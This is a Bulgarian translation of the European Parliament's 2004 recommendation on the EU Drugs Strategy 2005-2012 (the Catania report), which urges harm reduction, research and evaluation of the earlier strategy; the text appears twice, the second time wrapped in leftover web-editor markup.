Тенденцията в ЕС по отношение на дрогите: докладът “Катания”

strongПрепоръка на Европейския парламент до Съвета на ЕС и Европейския съвет относно Стратегията на ЕС за дрогите (2005-2012)/strong
Оригинален текст
15 декември 2004 г.
Окончателна редакция
P6_TA(2004)0101
A6-0067/2004
2004/2221(INI)
Европейският парламент,
– като разгледа предложението за препоръка до Съвета (подадено от Роза Диез Гонзалес от името на групата на европейските социалисти в Европейския парламент) относно Стратегията на ЕС за дрогите за периода 2005-2012 г. (B6-0070/2004), и като взема предвид
– Глава V от Договора за ЕС,
– Глава VI от Договора за ЕС и в частност Член 31(1)(e) и Член 34(2)(b),
– Договора за ЕС и в частност Член 252,
– Договора за приемане на Конституция за Европа и в частност неговите Членове I-16, I-17, I-40, II-94, II-95, III-271, III-278, III-305 и други,
– международните, европейски и национални инструменти за защита на човешките права и основни свободи и в частност правото на живот и здраве,
!–more– – влагането на Шенгенското общоевропейско право в Договорите за Европейския съюз (ЕС) и за Европейските общности (ЕО),
– Конвенциите на ООН за наркотичните вещества от 30 март 1961 г., поправена чрез Женевския протокол на 25 март 1972 г.; за психотропните вещества от 21 февруари 1971 г.; и срещу незаконния трафик на наркотици и психотропни вещества от 20 декември 1988 г.,
– Регулация (EEC) No 302/93 на Съвета от 8 февруари 1993 г. за създаване на Европейски център за мониторинг на дрогите и зависимостите (EMCDDA),
– Комюникето на ЕК до Съвета и Европейския парламент (ЕП) за Плана за действие на ЕС за борба с дрогите за периода 1995-1999 г. (COM(1994)0234),
– Политическата декларация за дрогите и резолюциите, приети от Специалната сесия на генералната асамблея на ООН от 8 и 10 юни 1998,!–more–
– Решение 102/97/EC на Съвета и ЕП от 16 декември 1996 г., с което бе приета програмата за предотвратяване на зависимостите от дроги в рамките на сектор здравеопазване,
– решение 96/750/JHA на Съвета от 17 декември 1996 г. относно сближаване на законите и практиките на държавите-членки на ЕС за борба със зависимостите от дроги и за предотвратяване на незаконния трафик на дроги;
– решение 97/396/JHA на Съвета от 16 юни 1997 г. за обмен на информация, оценки на риска и контрол на новите синтетични дроги;
– Регулация (EC) No 2046/97 на Съвета от 13 октомври 1997 г. за сътрудничеството между Севера и Юга в кампанията срещу дрогите и зависимостите,
– годишните доклади на EMCDDA,
– Планът за действие на ЕК и Съвета за най-правилното прилагане на разпоредбите на Амстердамския договор за създаване на област на свободата, сигурността и справедливостта (приет от Европейския съвет във Виена през декември 1998 г.) и в частност точки 13, 14, 44, 47 и 51 от него,
– заключенията на Европейския съвет в Тампер от 15-16 октомври 1999 г. и в частност точки 43, 48, 50, 59, 60, 61 и 62 от него,
– заключенията на Европейския съвет в Хелзинки от 10-11 декември 1999 г. и в частност заключение 53 от него, в което е отбелязана Стратегията на ЕС за дрогите за периода 2000-2004 г.,
– заключенията на Европейския съвет в Санта Мария да Фейра от 19-20 юни 2000 г. и в частност точка 51, с която се приема Планът за действие за периода 2000-2004 г.,
– Директива на ЕП и Съвета 2001/97/EC от 4 декември 2001г., която поправя Директива на Съвета 91/308/EEC за недопускане използването на финансовата система за пране на пари,
– Комюнике на ЕК до Съвета и ЕП за прилагане на Плана за действие на ЕС относно дрогите за периода 2000-2004 г. (COM(2001)0301 and COM(2002)0599),
– Предложението за регулация на Съвета, която да поправи Регулация EEC No 302/93 от 8 февруари 1993 г. за създаване на EMCDDA (COM(2003)0808),
– Регулация на ЕП и Съвета EC No 273/2004 от 11 февруари 2004 г. за прекурсорите,
– Рамковото решение на Съвета 2004/757/JHA от 25 октомври 2004 г., , което излага минималните разпоредби за съставните елементи на престъпленията и наказанията в областта на трафика на незаконни дроги,
– Правила 114(3) и 94(1) от Процесуалния правилник (Rules of Procedure),
– Доклада на Комисията за граждански свободи, правосъдие и вътрешен ред на ЕП (A6-0067/2004),
А. Предвид иключително високите равнища на консумация на дроги и търговията с тях във всички държави-членки на ЕС, отчитайки, че този проблем не може да бъде решен индивидуално от отделните държави-членки, е необходимо Европейският съюз (ЕС) да приеме достоверна обща политика за борба с дрогите и да я прилага интегрирано, глобално, с използване на всички необходими средства за предотвратяване на вредите върху човешкото здраве на потребителите на дроги и социалната изолация, която употребата им предизвиква и за поправяне на пораженията, нанесени на обществото от свързаните с дрогите престъпления;
B. с отчитане на факта, че производството и търговията с дроги е основният източник на приходи за европейската мафия, който осигурява нейната безнаказаност и корупция;
C. и предвид обстоятелството, че въпреки провежданите досега политики на международно, европейско и национално ниво производството, потреблението и продажбите на незаконните вещества, посочени в конвенциите на ОО, достигнаха изключително високи нива във всички държави-членки на ЕС и предвид провала на тази политика, е необходимо ЕС да ревизира общата си стратегия за наркотичбните вещества;
D. предвид решението на Съвета за правосъдие и вътрешен ред (JHA Council) от 8 юни 2004 г., според което ЕС се нуждае от нова стратегия за дрогите за периода 2005-2012 г. с два 3-годишни Плана за действие (от 2005 до 2007 г. и от 2009 до 2011 г.), всеки последван от едногодишен период на оценка (съответно 2008 г. и 2012 г.), която да бъде приета от Европейския съвет през декември 2004 г.;
E. като отчита, че на 6 юли 2004 г. Съвета на холандското президентство представи проекта за Стратегия на ЕС за периода 2005-2012 г. (CORDROGUE 53) на Хоризонталната работна група за дрогите (HDG) и като взема предвид заключенията на Дъблинската конференция за стратегия на ЕС за дрогите (CORDROGUE 36) от 10 и 11 май 2004 г., които бяха разгледани и на заседанията от 7-8 септември и 30 септември -1 октомври 2004 г.,
F. доколкото Съветът договори с Хоризонталната работна група за дрогите и CATS (комитетът, споменат в Член 36 от Договора за ЕС) съдържанието на Стратегията на ЕС (2005-2012 г.), без да знае каква е политическата и техническа оценка за Стратегията на ЕС за периода 2000-2004 г. и за приложението на нейния План за действие, разработен от Европейската комисия и EMCDDA, чиито резултати бяха представени от EMCDDA на Съвета за правосъдие и вътрешен ред на 25-26 октомври 2004 г. и на Европейския парламент на 24 ноември 2004 г., поради което не беше направена оценка до каква степен са постигнати 11-те генерални цели и 6-те принципни цели на Стратегията за периода 2000-2004 г.;
G. предвид обстоятелството, че Комисията за наркотичните вещества на ООН подготвя специална сесия на ООН за дрогите, която ще се проведе през 2008г. 10 години след специалната сесия от 1998 г.;
H. поради необходимостта от разработването на точни, измерими, оперативни цели, за да може да се прецени дали и доколко целите и мерките, формулирани в предишната стратегия са дали резултати;
I. с вярата, че рискът от употребата на дроги трябва да се анализира от научна, социологична и културологична гледна точка, за да се избегне опростенчеството в при анализиране на многобройните проблеми, свързани с дрогите; и че освен сравняването на данни и цели е необходимо да се изследват внимателно всички други последици и поражения, нанесени от сегашната политика на обществото; и като призоваваме тези анализи и оценки да бъдат публикувани;
J. предвид необходимостта националната политика да бъде основана на научно познание за всеки тип дрога, а не на емоционални реакции, и понеже всеки един от проблемите с дрогите изисква отделен, специфичен подход, докато генерализираният подход подкопава надеждността на провежданата политика във всичките й аспекти;
K. и предвид жизнената необходимост от ревизия на политиката за дрогите с оглед тя да стане по-ефективна и ефикасна на базата на споменатите оценки и анализи, със специално ударение върху алтернативните политики, които вече дават по-добри резултати в много държави-членки на ЕС, например намаляване броя на смъртните случаи при потребление на дрога, опазване здравето на потребителите на дроги и осигуряване на социалната и икономическа реинтеграция на зависимите от дроги,
L. Препоръчва следното на Съвета на ЕС и на Европейския съвет, при определяне на бъдещата стратегия на ЕС за дрогите за периода 2005-2012:
a) да се даде ново определение за европейско сътрудничество в политиката за дрогите, която има за цел да справи с мащабния трафик на дроги, включително и трансграничен, което да отчита всички страни на проблема и да се основава на научнo познание, зачитане на човешките права, гражданските свободи и на защитата на живота и здравето на човека.
b) Да се зададат ясни, точни, измерими цели и приоритети, които в бъдещите Планове за действие да бъдат изразени в индикатори за оценка на операциите и мерки; да зададе точно отговорностите и крайните срокове за прилагането на плановете като зачита принципа на субсидиарността.
c) Да се отчете факта, че Стратегията на ЕС за дрогите за периода 2000-2004 г. не произведе резултати и да си извади политически и законодателни поуки от този факт, които да бъдат отразени в новата Стратегия за периода 2005-2012 и нейните планове за действие;
e) новата стратегия да се базира повече на научните изследвания и задълбочена консултация със съответните организации в държавите-членки;
f) да се засилят научните и социални изследвания върху незаконните дроги, които да бъдат използвани по съответното медицинско и социално предназначение;
h) да се създаде алтернатива на сегашната финансова фрагментация като открие нова бюджетна линия, без която целите в бъдещата Стратегия няма да бъдат постигнати;
i) да се създаде специална бюджетна линия за консултации с организациите на гражданското общество и независими професионалисти за въздействието на политиката срещу дрогите върху гражданите;
j) да се проведе подробно оценяване на ефективността, с която е прилагана предишната стратегия, и по-конкретно на:
- превенцията на употребата и зависимостта от дроги,
- намаляване на търсенето и предлагането на незаконни дроги,
- ограничаване на вредите за обществото (маргинализацията),
- ограничаване на вредите за здравето,
- намаляване на свързаната с дрогите организирана престъпност, както и дребните престъпления. Новата Стратегия на ЕС за периода 2005-2012 не трябва да бъде приемана, докато не се изяснят реалните резултати, постигнати от предишната стратегия за периода 2000-2004 г., оценени според съответните технически, научни, законодателни и политически средства за оценка;
k) да се информират периодично Европейския парламент (ЕП) в съответствие с принципите на демократичната легитимност, прозрачност и сътрудничество между институциите, за напредъка на преговорите вътре в Съвета за Стратегията на ЕС (2005-2012);
l) да се проведат консултации с Европейския парламент за новата Стратегия 2005-2012 г. преди да я приеме, така че становището на парламентаристите да бъде взето предвид;
m) да бъдат предложени мерки, напълно различни от сегашните, като даде приоритет на запазване здравето и живота на потребителите на незаконни дроги, като подобри тяхното благосъстояние и защита чрез балансиран, интегриран подход към, проблема, тъй като направените засега предложения са неадекватни;
o) да се вземат предвид окуражителните резултати, постигнати от различни държави-членки на ЕС, които прилагат алтернативни подходи към проблема с дрогите;
p) да се установят минимални стандарти за рехабилитация и интервенция, с цел намаляване на вредите за обществото;
q) да се увеличи предлагането на програми за намаляване вредите върху здравето на потребителите на дроги, включително и разпространението нa болести, предавани по кръвен път като например ХИВ;
s) да се зададат минимални стандарти за рехабилитационните мерки, отчитащи най-добрите практики в държавите-членки, които да заменят прекомерното практикуване на лечение чрез заместители на дрогите. Нужно е да се положат специални усилия за по-широка социална рехабилитация;
t) да се постави много по-силно ударение върху намаляването на вредите, информирането, превенцията, грижите за запазване живота и здравето на хората, които имат проблеми в резултат от употребата на незаконни вещества; да се набележат мерки, които да ги предпазят от маргинализация и тези мерки да заменят репресивните стратегии, водещи много често до нарушения на човешки права;
u) да се разработят и приложат програми за рехабилитация на нарушители/потребители като алтернатива на затвора, тъй като такива програми се оказаха резултатни в страните, където бяха прилагани;
v) да се увеличи на финансирането за разпространяване на информация за незаконните вещества и предотвратяване на употребата на дроги, особено в училищата, както предвижда Плана за действие за 2000-2004 г. и да с ограничат отрицателните въздействия от употребата на дроги и свързаните с тях рискове;
w) ударението да се постави върху засилването на мерките за по-добро информиране въз основата на научното познание за последиците от употребата на различните дроги (и преди всичко на синтетичните), така че всички да бъдат добре и убедително осведомени;
x) Експоненциално (над 10 пъти – б.пр.) да се увеличи участието на зависимите от незаконни дроги, потребителите на незаконни дроги, гражданското общество, неправителствените организации, доброволците и активистите, както и цялото общество, в решаването на проблемите с дрогите. По-конкретно, в работата на Хоризонталната работна група за дрогите (Horizontal Drugs Group) трябва да участват организации, които работят в тази област, чрез организирането на ежегодна Европейска инициатива за превенция и чрез създаването на експериментални лесно достъпни неформални центрове, които да работят срещу забраната на дрогите и в полза на стратегията за намаляване на вредите;
y) да се въведат такива мерки за оценка, които позволяват недостатъците в целите на Стратегия 2005-2012 да бъдат открити и коригирани;
z) да се предприемат стъпки за пресичане на финансирането на международния тероризъм с пари от трафика на незаконни дроги и да се прилага законодателството за конфискация на стоки, за борба с прането на пари и италианския закон срещу мафията, според който конфискуваните активи на престъпните организации да се използват за социални цели;
aa) във всички международни договори, и особено в новите споразумения за сътрудничество с трети страни, да се включва специална клауза за борба с дрогите, която да има статут на основна;
ab) да се увеличи значително помощта за развитие на страните-производителки на дроги чрез програми за устойчиво развитие на алтернативни земеделски култури и радикално намаляване на бедността; да се проучи възможността за запазване на производството на опиати за медицински и научни цели, както и възможността за започване на пилотни проекти за индустриално производство на законни продукти от кока, индийски коноп и други растения обхванати от Конвенцията на ООН от 1961 г.
ac) да се осигури достъп до програми за заместващи продукти, особено в затворите, като в същото време се насърчават алтернативите на затвора за потребителите на незаконни вещества или за други сходни нарушения с незначителни последици;
ad) да се разширят изследванията върху употребата на растения, който понастоящем са забранени или попадат в “сивата зона”, като конопа, опиума и коката, за медицинска употреба, безопасност на храните, устойчиво земеделие, алтернативни енергийни източници, заместители на изходни продукти за производство на дървесина и масла, и други полезни приложения;
ae) да се преразгледа рамковото решение за наркотрафика, като в него се включат възгледите на Европейския парламент, в съответствие с принципите на субсидиарността и пропорционалността, гарантирани от Договорите;
af) да се проведе научно изследване върху предимствата и недостатъците на водената сега политика за контрол над наркотичните вещества. В частност да се направят научни изследвания върху канабиса и неговите разнообразни законни и незаконни деривати, да се оценят техните въздействия, терапевтичния им потенциал, резултатите от досегашната политика на криминализацията и нейните алтернативи; да се анализира ефективността на програмите за разпространение на хероина под медицински контрол с терапевтична цел – за намаляване на смъртните случаи при инжектиране на дрога; да се анализират икономическите, законови, социални и екологични последици от забраната на дрогите с оглед на цената, която се плаща в човешки и финансови ресурси при налагане на забранителния закон; да се анализира въздействието на сегашната Стратегия на ЕС и на действащата понастоящем глобална система за контрол на дрогите върху обществата на страните, които не са членки на ЕС;
ag) да се изиска от правителствата и националните парламенти да внедрят ефективни мерки, които да пресекат внасянето на дроги в затворите
2. Възлага на председателя на ЕП да внесе тази препоръка в Съвета на министрите на ЕС и в Европейския съвет и, за сведение, в Европейската комисия и правителствата и парламентите на държавите-членки, Европейския съвет за мониторинг на дрогите и зависимостите, Съвета на Европа, Организацията на обединените нации и нейните специализирани агенции.
(1) OJ L 36, 12.2.1993, p. 1.
(2) OJ L 19, 22.1.1997, p. 25.
(3) OJ L 342, 31.12.1996, p. 6.
(4) OJ L 167, 25.6.1997, p. 1.
(5) OJ L 287, 21.10.1997, p. 1.
(6) OJ C 19, 23.1.1999, p. 1.
(7) OJ L 344, 28.12.2001, p. 76.
(8) OJ L 47, 18.2.2004, p. 1.
(9) OJ L 335, 11.11.2004, p.8.
div id=_mcePaste style=overflow: hidden; position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px;
table id=AutoNumber1 style=border-collapse: collapse; border=0 cellspacing=0 cellpadding=0 width=100% bordercolor=#111111
tbody
tr
td style=font-size: 26px; color: #5aba52; text-transform: uppercase; width=100%
p class=viewbodytitleДОКЛАДЪТ КАТАНИЯ/p
/td
/tr
tr
td style=text-align: left; width=100%
p class=viewbodydate31/05/2005  !–a href=inside/pop_profile.asp?mode=display#038;id=4 mce_href=inside/pop_profile.asp?mode=displayamp;id=4Gligi–/p
/td
/tr
tr
td style=text-align: left; width=100%
p class=viewbodytextПрепоръка на Европейския парламент до Съвета на ЕС и Европейския съвет относно Стратегията на ЕС за дрогите (2005-2012)/p
a href=http://www2.europarl.eu.int/omk/sipade2?PUBREF=-//EP//TEXT%20TA%20P6-TA-2004-0101%200%20DOC%20XML%20V0//ENamp;LEVEL=3amp;NAV=X target=_blankОригиналин текст/a
15 декември 2004 г.
Окончателна редакция
P6_TA(2004)0101
A6-0067/2004
2004/2221(INI)
Европейският парламент, span style=font-size: xx-small;
– като разгледа предложението за препоръка до Съвета (подадено от Роза Диез Гонзалес от името на групата на европейските социалисти в Европейския парламент) относно Стратегията на ЕС за дрогите за периода 2005-2012 г. (B6-0070/2004), и като взема предвид
– Глава V от Договора за ЕС,
– Глава VI от Договора за ЕС и в частност Член 31(1)(e) и Член 34(2)(b),
– Договора за ЕС и в частност Член 252,
– Договора за приемане на Конституция за Европа и в частност неговите Членове I-16, I-17, I-40, II-94, II-95, III-271, III-278, III-305 и други,
– международните, европейски и национални инструменти за защита на човешките права и основни свободи и в частност правото на живот и здраве,
– влагането на Шенгенското общоевропейско право в Договорите за Европейския съюз (ЕС) и за Европейските общности (ЕО),
– Конвенциите на ООН за наркотичните вещества от 30 март 1961 г., поправена чрез Женевския протокол на 25 март 1972 г.; за психотропните вещества от 21 февруари 1971 г.; и срещу незаконния трафик на наркотици и психотропни вещества от 20 декември 1988 г.,
– Регулация (EEC) No 302/93 на Съвета от 8 февруари 1993 г. за създаване на Европейски център за мониторинг на дрогите и зависимостите (EMCDDA),
– Комюникето на ЕК до Съвета и Европейския парламент (ЕП) за Плана за действие на ЕС за борба с дрогите за периода 1995-1999 г. (COM(1994)0234),
– Политическата декларация за дрогите и резолюциите, приети от Специалната сесия на генералната асамблея на ООН от 8 и 10 юни 1998,
– Решение 102/97/EC на Съвета и ЕП от 16 декември 1996 г., с което бе приета програмата за предотвратяване на зависимостите от дроги в рамките на сектор здравеопазване,
– решение 96/750/JHA на Съвета от 17 декември 1996 г. относно сближаване на законите и практиките на държавите-членки на ЕС за борба със зависимостите от дроги и за предотвратяване на незаконния трафик на дроги;
– решение 97/396/JHA на Съвета от 16 юни 1997 г. за обмен на информация, оценки на риска и контрол на новите синтетични дроги;
– Регулация (EC) No 2046/97 на Съвета от 13 октомври 1997 г. за сътрудничеството между Севера и Юга в кампанията срещу дрогите и зависимостите,
– годишните доклади на EMCDDA,
– Планът за действие на ЕК и Съвета за най-правилното прилагане на разпоредбите на Амстердамския договор за създаване на област на свободата, сигурността и справедливостта (приет от Европейския съвет във Виена през декември 1998 г.) и в частност точки 13, 14, 44, 47 и 51 от него,
– заключенията на Европейския съвет в Тампер от 15-16 октомври 1999 г. и в частност точки 43, 48, 50, 59, 60, 61 и 62 от него,
– заключенията на Европейския съвет в Хелзинки от 10-11 декември 1999 г. и в частност заключение 53 от него, в което е отбелязана Стратегията на ЕС за дрогите за периода 2000-2004 г.,
– заключенията на Европейския съвет в Санта Мария да Фейра от 19-20 юни 2000 г. и в частност точка 51, с която се приема Планът за действие за периода 2000-2004 г.,
– Директива на ЕП и Съвета 2001/97/EC от 4 декември 2001г., която поправя Директива на Съвета 91/308/EEC за недопускане използването на финансовата система за пране на пари,
– Комюнике на ЕК до Съвета и ЕП за прилагане на Плана за действие на ЕС относно дрогите за периода 2000-2004 г. (COM(2001)0301 and COM(2002)0599),
– Предложението за регулация на Съвета, която да поправи Регулация EEC No 302/93 от 8 февруари 1993 г. за създаване на EMCDDA (COM(2003)0808),
– Регулация на ЕП и Съвета EC No 273/2004 от 11 февруари 2004 г. за прекурсорите,
– Рамковото решение на Съвета 2004/757/JHA от 25 октомври 2004 г., , което излага минималните разпоредби за съставните елементи на престъпленията и наказанията в областта на трафика на незаконни дроги,
– Правила 114(3) и 94(1) от Процесуалния правилник (Rules of Procedure),
– Доклада на Комисията за граждански свободи, правосъдие и вътрешен ред на ЕП (A6-0067/2004),/span
strongА./strong Предвид иключително високите равнища на консумация на дроги и търговията с тях във всички държави-членки на ЕС, отчитайки, че този проблем не може да бъде решен индивидуално от отделните държави-членки, е необходимо Европейският съюз (ЕС) да приеме достоверна обща политика за борба с дрогите и да я прилага интегрирано, глобално, с използване на всички необходими средства за предотвратяване на вредите върху човешкото здраве на потребителите на дроги и социалната изолация, която употребата им предизвиква и за поправяне на пораженията, нанесени на обществото от свързаните с дрогите престъпления;
strongB./strong с отчитане на факта, че производството и търговията с дроги е основният източник на приходи за европейската мафия, който осигурява нейната безнаказаност и корупция;
strongC./strong и предвид обстоятелството, че въпреки провежданите досега политики на международно, европейско и национално ниво производството, потреблението и продажбите на незаконните вещества, посочени в конвенциите на ОО, достигнаха изключително високи нива във всички държави-членки на ЕС и предвид провала на тази политика, е необходимо ЕС да ревизира общата си стратегия за наркотичбните вещества;
strongD./strong предвид решението на Съвета за правосъдие и вътрешен ред (JHA Council) от 8 юни 2004 г., според което ЕС се нуждае от нова стратегия за дрогите за периода 2005-2012 г. с два 3-годишни Плана за действие (от 2005 до 2007 г. и от 2009 до 2011 г.), всеки последван от едногодишен период на оценка (съответно 2008 г. и 2012 г.), която да бъде приета от Европейския съвет през декември 2004 г.;
strongE./strong като отчита, че на 6 юли 2004 г. Съвета на холандското президентство представи проекта за Стратегия на ЕС за периода 2005-2012 г. (CORDROGUE 53) на Хоризонталната работна група за дрогите (HDG) и като взема предвид заключенията на Дъблинската конференция за стратегия на ЕС за дрогите (CORDROGUE 36) от 10 и 11 май 2004 г., които бяха разгледани и на заседанията от 7-8 септември и 30 септември -1 октомври 2004 г.,
strongF./strong доколкото Съветът договори с Хоризонталната работна група за дрогите и CATS (комитетът, споменат в Член 36 от Договора за ЕС) съдържанието на Стратегията на ЕС (2005-2012 г.), без да знае каква е политическата и техническа оценка за Стратегията на ЕС за периода 2000-2004 г. и за приложението на нейния План за действие, разработен от Европейската комисия и EMCDDA, чиито резултати бяха представени от EMCDDA на Съвета за правосъдие и вътрешен ред на 25-26 октомври 2004 г. и на Европейския парламент на 24 ноември 2004 г., поради което не беше направена оценка до каква степен са постигнати 11-те генерални цели и 6-те принципни цели на Стратегията за периода 2000-2004 г.;
strongG./strong предвид обстоятелството, че Комисията за наркотичните вещества на ООН подготвя специална сесия на ООН за дрогите, която ще се проведе през 2008г. 10 години след специалната сесия от 1998 г.;
strongH./strong поради необходимостта от разработването на точни, измерими, оперативни цели, за да може да се прецени дали и доколко целите и мерките, формулирани в предишната стратегия са дали резултати;
strongI./strong с вярата, че рискът от употребата на дроги трябва да се анализира от научна, социологична и културологична гледна точка, за да се избегне опростенчеството в при анализиране на многобройните проблеми, свързани с дрогите; и че освен сравняването на данни и цели е необходимо да се изследват внимателно всички други последици и поражения, нанесени от сегашната политика на обществото; и като призоваваме тези анализи и оценки да бъдат публикувани;
strongJ./strong предвид необходимостта strongнационалната политика да бъде основана на научно познание за всеки тип дрога, а не на емоционални реакции/strong, и понеже всеки един от проблемите с дрогите изисква отделен, специфичен подход, докато генерализираният подход подкопава надеждността на провежданата политика във всичките й аспекти;
strongK./strong и предвид жизнената необходимост от ревизия на политиката за дрогите с оглед тя да стане по-ефективна и ефикасна на базата на споменатите оценки и анализи, със специално ударение върху алтернативните политики, които вече дават по-добри резултати в много държави-членки на ЕС, например намаляване броя на смъртните случаи при потребление на дрога, strongопазване здравето на потребителите на дроги и осигуряване на социалната и икономическа реинтеграция на зависимите от дроги/strong,
strongL./strong Препоръчва следното на Съвета на ЕС и на Европейския съвет, при определяне на бъдещата стратегия на ЕС за дрогите за периода 2005-2012:
stronga)/strong да се даде ново определение за европейско сътрудничество в политиката за дрогите, която има за цел да справи с мащабния трафик на дроги, включително и трансграничен, което да отчита всички страни на проблема и да се основава на научнo познание, зачитане на човешките права, гражданските свободи и на защитата на живота и здравето на човека.
strongb)/strong Да се зададат ясни, точни, измерими цели и приоритети, които в бъдещите Планове за действие да бъдат изразени в индикатори за оценка на операциите и мерки; да зададе точно отговорностите и крайните срокове за прилагането на плановете като зачита принципа на субсидиарността.
strongc)/strong Да се отчете факта, че Стратегията на ЕС за дрогите за периода 2000-2004 г. не произведе резултати и да си извади политически и законодателни поуки от този факт, които да бъдат отразени в новата Стратегия за периода 2005-2012 и нейните планове за действие;
stronge)/strong strongновата стратегия да се базира повече на научните изследвания и задълбочена консултация със съответните организации/strong в държавите-членки;
strongf)/strong да се засилят научните и социални изследвания върху незаконните дроги, които да бъдат използвани по съответното медицинско и социално предназначение;
strongh)/strong да се създаде алтернатива на сегашната финансова фрагментация като открие нова бюджетна линия, без която целите в бъдещата Стратегия няма да бъдат постигнати;
strongi)/strong да се създаде специална бюджетна линия за консултации с организациите на гражданското общество и независими професионалисти за въздействието на политиката срещу дрогите върху гражданите;
strongj)/strong да се проведе подробно оценяване на ефективността, с която е прилагана предишната стратегия, и по-конкретно на:
- превенцията на употребата и зависимостта от дроги,
- намаляване на търсенето и предлагането на незаконни дроги,
- ограничаване на вредите за обществото (маргинализацията),
- ограничаване на вредите за здравето,
- намаляване на свързаната с дрогите организирана престъпност, както и дребните престъпления. strongНовата Стратегия на ЕС за периода 2005-2012 не трябва да бъде приемана, докато не се изяснят реалните резултати, постигнати от предишната стратегия за периода 2000-2004 г./strong, оценени според съответните технически, научни, законодателни и политически средства за оценка;
strongk)/strong да се информират периодично Европейския парламент (ЕП) в съответствие с принципите на демократичната легитимност, прозрачност и сътрудничество между институциите, за напредъка на преговорите вътре в Съвета за Стратегията на ЕС (2005-2012);
strongl)/strong да се проведат консултации с Европейския парламент за новата Стратегия 2005-2012 г. преди да я приеме, така че становището на парламентаристите да бъде взето предвид;
strongm)/strong да бъдат предложени strongмерки, напълно различни от сегашните, като даде приоритет на запазване здравето и живота на потребителите/strong на незаконни дроги, като подобри тяхното благосъстояние и защита чрез балансиран, интегриран подход към, проблема, тъй като направените засега предложения са неадекватни;
strongo)/strong да се вземат предвид окуражителните резултати, постигнати от различни държави-членки на ЕС, които прилагат алтернативни подходи към проблема с дрогите;
strongp)/strong да се strongустановят минимални стандарти за рехабилитация и интервенция, с цел намаляване на вредите за обществото/strong;
strongq)/strong да се увеличи предлагането на strongпрограми за намаляване вредите върху здравето на потребителите на дроги/strong, включително и разпространението нa болести, предавани по кръвен път като например ХИВ;
strongs)/strong да се зададат минимални стандарти за рехабилитационните мерки, отчитащи най-добрите практики в държавите-членки, които да заменят прекомерното практикуване на лечение чрез заместители на дрогите. Нужно е да се положат специални усилия за по-широка социална рехабилитация;
strongt)/strong да се постави много по-силно ударение върху strongнамаляването на вредите, информирането, превенцията, грижите за запазване живота и здравето на хората/strong, които имат проблеми в резултат от употребата на незаконни вещества; да се набележат мерки, които да ги предпазят от маргинализация и strongтези мерки да заменят репресивните стратегии, водещи много често до нарушения на човешки права/strong;
strongu)/strong да се разработят и приложат програми за strongрехабилитация на нарушители/потребители като алтернатива на затвора, тъй като такива програми се оказаха резултатни/strong в страните, където бяха прилагани;
strongv)/strong strongда се увеличи на финансирането за разпространяване на информация за незаконните вещества и предотвратяване на употребата на дроги, особено в училищата/strong, както предвижда Плана за действие за 2000-2004 г. и да с ограничат отрицателните въздействия от употребата на дроги и свързаните с тях рискове;
strongw)/strong ударението да се постави върху strongзасилването на мерките за по-добро информиране въз основата на научното познание/strong за последиците от употребата на различните дроги (и преди всичко на синтетичните), така че всички да бъдат добре и убедително осведомени;
strongx)/strong Експоненциално (над 10 пъти – б.пр.) strongда се увеличи участието на зависимите от незаконни дроги, потребителите на незаконни дроги, гражданското общество, неправителствените организации, доброволците и активистите, както и цялото общество, в решаването на проблемите с дрогите/strong. По-конкретно, в работата на Хоризонталната работна група за дрогите (Horizontal Drugs Group) трябва да участват организации, които работят в тази област, чрез организирането на ежегодна Европейска инициатива за превенция и чрез създаването на експериментални лесно достъпни неформални центрове, които да работят срещу забраната на дрогите и в полза на стратегията за намаляване на вредите;
strongy)/strong да се въведат такива мерки за оценка, които позволяват недостатъците в целите на Стратегия 2005-2012 да бъдат открити и коригирани;
strongz)/strong да се предприемат стъпки за пресичане на финансирането на международния тероризъм с пари от трафика на незаконни дроги и да се прилага законодателството за конфискация на стоки, за борба с прането на пари и италианския закон срещу мафията, според който конфискуваните активи на престъпните организации да се използват за социални цели;
strongaa)/strong във всички международни договори, и особено в новите споразумения за сътрудничество с трети страни, да се включва специална клауза за борба с дрогите, която да има статут на основна;
strongab)/strong да се увеличи значително помощта за развитие на страните-производителки на дроги чрез програми за устойчиво развитие на алтернативни земеделски култури и радикално намаляване на бедността; да се проучи възможността за запазване на производството на опиати за медицински и научни цели, както и възможността за strongзапочване на пилотни проекти за индустриално производство на законни продукти от кока, индийски коноп и други растения/strong обхванати от Конвенцията на ООН от 1961 г.
strongac)/strong да се осигури strongдостъп до програми за заместващи продукти, особено в затворите, като в същото време се насърчават алтернативите на затвора/strong за потребителите на незаконни вещества или за други сходни нарушения с незначителни последици;
strongad)/strong strongда се разширят изследванията върху употребата на растения, който понастоящем са забранени или попадат в “сивата зона”, като конопа, опиума и коката, за медицинска употреба, безопасност на храните, устойчиво земеделие, алтернативни енергийни източници, заместители на изходни продукти за производство на дървесина и масла, и други полезни приложения/strong;
strongae)/strong да се преразгледа рамковото решение за наркотрафика, като в него се включат възгледите на Европейския парламент, в съответствие с принципите на субсидиарността и пропорционалността, гарантирани от Договорите;
strongaf)/strong strongда се проведе научно изследване върху предимствата и недостатъците на водената сега политика за контрол над наркотичните вещества/strong. В частност да се направят strongнаучни изследвания върху канабиса и неговите разнообразни законни и незаконни деривати, да се оценят техните въздействия, терапевтичния им потенциал, резултатите от досегашната политика на криминализацията и нейните алтернативи/strong; да се анализира ефективността на програмите за разпространение на хероина под медицински контрол с терапевтична цел – за намаляване на смъртните случаи при инжектиране на дрога; да се анализират икономическите, законови, социални и екологични последици от забраната на дрогите с оглед на цената, която се плаща в човешки и финансови ресурси при налагане на забранителния закон; да се анализира въздействието на сегашната Стратегия на ЕС и на действащата понастоящем глобална система за контрол на дрогите върху обществата на страните, които не са членки на ЕС;
strongag)/strong да се изиска от правителствата и националните парламенти да внедрят strongефективни мерки, които да пресекат внасянето на дроги в затворите/strong
strong2./strong Възлага на председателя на ЕП да внесе тази препоръка в Съвета на министрите на ЕС и в Европейския съвет и, за сведение, в Европейската комисия и правителствата и парламентите на държавите-членки, Европейския съвет за мониторинг на дрогите и зависимостите, Съвета на Европа, Организацията на обединените нации и нейните специализирани агенции.
span style=font-size: xx-small;(1) OJ L 36, 12.2.1993, p. 1.
(2) OJ L 19, 22.1.1997, p. 25.
(3) OJ L 342, 31.12.1996, p. 6.
(4) OJ L 167, 25.6.1997, p. 1.
(5) OJ L 287, 21.10.1997, p. 1.
(6) OJ C 19, 23.1.1999, p. 1.
(7) OJ L 344, 28.12.2001, p. 76.
(8) OJ L 47, 18.2.2004, p. 1.
(9) OJ L 335, 11.11.2004, p.8./span/td
/tr
/tbody/table
